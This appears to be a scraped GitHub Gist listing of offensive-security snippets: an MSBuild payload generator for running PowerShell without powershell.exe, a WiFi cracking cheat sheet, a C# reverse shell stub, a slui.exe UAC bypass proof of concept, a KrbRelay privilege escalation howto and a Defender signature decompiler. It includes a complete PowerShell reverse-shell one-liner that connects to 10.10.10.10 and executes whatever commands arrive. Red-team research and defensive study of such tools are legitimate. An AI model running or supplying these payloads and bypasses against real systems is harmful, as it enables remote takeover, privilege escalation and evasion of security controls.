Caue B caueb
mgeeky
/ generateMSBuildPowershellXML.py
Last active
September 12, 2024 05:09
Powershell via MSBuild inline-task XML payload generation script - To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| # | |
| # Red-Teaming script that will leverage MSBuild technique to convert Powershell input payload or | |
| # .NET/CLR assembly EXE file into inline-task XML file that can be further launched by: | |
| # %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | |
| # | |
| # Requirements: | |
| # - pefile | |
| # | |
| # Mariusz B. / mgeeky, <[email protected]> |
egre55
/ powershell_reverse_shell.ps1
Last active
January 27, 2026 21:46
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html | |
| $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
SevenLayerJedi
/ WiFi Cracking Cheat Sheet
Created
February 7, 2019 18:23
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # put your network device into monitor mode | |
| # Turn off Int | |
| Set interface down | |
| sudo ip link set wlan0 down | |
| # Set monitor mode | |
| iwconfig wlan0 mode monitor | |
| # Turn up interface | |
| ip link set wlan0 up |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| namespace RevShell | |
| { | |
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Net.Sockets; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| namespace ConnectBack |
r00t-3xp10it
/ SluiPOC.ps1
Last active
August 20, 2025 12:26
slui.exe (ChangePK) Privilege escalation POC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .Author: | |
| @r00t-3xp10it - version 1.2 | |
| .Disclosure: | |
| @mattharr0ey | |
| https://medium.com/@mattharr0ey/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b | |
| .DESCRIPTION: | |
| How does Slui UAC bypass work? There is a tool named ChangePK in System32 has a service that opens a window (for you) |
tothi
/ krbrelay_privesc_howto.md
Last active
January 24, 2026 07:17
Privilege Escalation using KrbRelay and RBCD
Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.
No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.
Prerequisites:
- LDAP signing not required on Domain Controller (default!)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Original script and research by commial | |
| ### https://github.com/commial/experiments/tree/master/windows-defender | |
| ### Set LUADec_Path to binary | |
| ### https://github.com/viruscamp/luadec | |
| import struct | |
| import argparse | |
| import sys | |
| import os | |
| import io | |
| import subprocess |